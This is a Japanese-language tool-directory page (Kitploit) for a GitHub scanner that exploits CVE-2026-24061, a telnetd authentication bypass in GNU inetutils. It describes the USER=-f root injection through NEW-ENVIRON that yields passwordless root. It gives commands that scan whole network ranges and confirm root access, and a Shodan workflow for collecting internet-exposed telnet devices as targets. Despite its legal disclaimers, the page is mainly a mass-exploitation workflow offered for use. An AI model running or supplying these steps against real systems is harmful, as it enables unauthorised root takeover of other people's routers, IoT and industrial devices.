Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
scan-cve-2026-24061 — CVE-2026-24061 telnetd 認証バイパスをスキャンし、ペイロードを生成して、脆弱なGNU inetutils telnetdデバイス上でrootアクセスを検証します。 | Kitploit
ツール/GitHubGitHub/killsystema/scan-cve-2026-24061
偵察脆弱性スキャナーIoTセキュリティエクスプロイトネットワークセキュリティペネトレーションテスト
GitHubkillsystema/scan-cve-2026-24061

scan-cve-2026-24061

CVE-2026-24061 telnetd 認証バイパスをスキャンし、ペイロードを生成して、脆弱なGNU inetutils telnetdデバイス上でrootアクセスを検証します。

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061 スキャナー – GNU inetutils telnetd 認証バイパス

⚠️ 非常に重要な法的注意事項 ⚠️
このツールは教育目的、セキュリティ研究、脆弱性分析、および許可を得たテスト専用です。

  • あなたが所有していない、または書面による明示的な許可を得ていないシステムに対する不正な使用は犯罪です(ブラジルでは刑法第154-A条+法律14.155/2021、その他の国際法も適用)。
  • 自分の環境、管理されたラボ、または署名済みのRoE(Rules of Engagement)に基づくペンテスト/レッドチームでのみ使用してください。
  • 著者は、不正使用、損害、IPブロック、法的結果、悪意のある悪用について一切責任を負いません。

脆弱性について(CVE-2026-24061)

  • 正式名称: GNU inetutils telnetd ≤ 2.7 – Authentication Bypass to Root Shell
  • CVSS: 9.8(クリティカル)
  • 悪用手法: NEW-ENVIRONオプションを介してUSER=-f root(またはその亜種)を送信すると、パスワードなしで即座にrootとしてログインできます。
  • 影響を受ける対象: IoTデバイス、古いルーター、組み込みシステム、NAS、DVR、産業用PLCなど、依然としてGNU inetutils telnetd(バージョン≤ 2.7)を使用している機器。
  • 2026年2月時点の状況: 実環境で活発に悪用されています(2026年1月よりCISA KEVに登録、GreyNoiseが毎日の試行を検出)。

特別な謝辞

このスキャナーは、Hakai Securityチームが公開した優れた技術分析と概念実証のおかげで実現しました。
彼らの詳細な記事は、悪用ベクトル、実際のペイロード、脆弱なtelnetdの動作に関する正確な技術的基盤を提供しました。

→ 完全な分析はこちらで読めます:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/

Hakai Securityに多大なる感謝を – 透明性、技術的品質、そしてセキュリティコミュニティへの貢献に感謝します。皆さんの協力により、このツールは責任ある研究のためのより正確で有用なものになりました。

スキャナーの機能

  • 個別IP、CIDR(/24、/16など)、およびターゲットリストを含む.txtファイルのサポート
  • 大規模ネットワークに対する警告付きの自動IPv4クラスフルクラス(A/B/C)検出
  • 複数のペイロードの動的生成(-f root、-f admin、--、-pなどのバリエーション)
  • --usersによるカスタマイズ可能なユーザーリスト(デフォルトにはroot、admin、pi、ubuntu、debianなどが含まれます)
  • idおよびwhoamiによる実際のroot確認(--verify)
  • Telnetバナーの取得と表示(--banner)
  • ポート23でのSSHの早期検出(誤検知を避けるためテストをスキップ)
  • 並列実行(-wで調整可能)
  • カラー出力: 脆弱なターゲットには太字の赤 + "!!! VULNERÁVEL !!!"
  • Ctrl+Cの丁寧な処理
  • IP順にソートされたJSON形式で結果を保存

インストール

root@kitploit:~
# 推奨: virtualenvを使用
python3 -m venv venv-cve
source venv-cve/bin/activate

# 依存関係をインストール
pip install telnetlib3 colorama

基本的な使用方法

root@kitploit:~
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50

# ターゲットリスト付き(例: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json

# rootに焦点を当てる(より高速)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5

# ドライラン(IPリストのみ表示)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run

ターゲットの取得方法(Shodan CLIの例)

root@kitploit:~
pip install shodan

# APIキーで初期化
shodan init SUA_API_KEY_AQUI

# 可能性のあるターゲットをダウンロード
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'

# IPを抽出
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt

# スキャン
python3 scan-cve-2026-24061.py alvos.txt --verify --banner

貢献

倫理的な焦点を維持し、責任に関する警告を強化する限り、プルリクエストは歓迎します。 ライセンス MITライセンス – ただし強調します: 不正使用はユーザー単独の責任です。 学習、啓発、セキュリティ研究のために作られました。

⭐ 役に立ったと思ったら、スターを付けてください!

🛡️ 細心の注意を払って使用してください。

Made with ❤️ by killsystema

ツールをダウンロード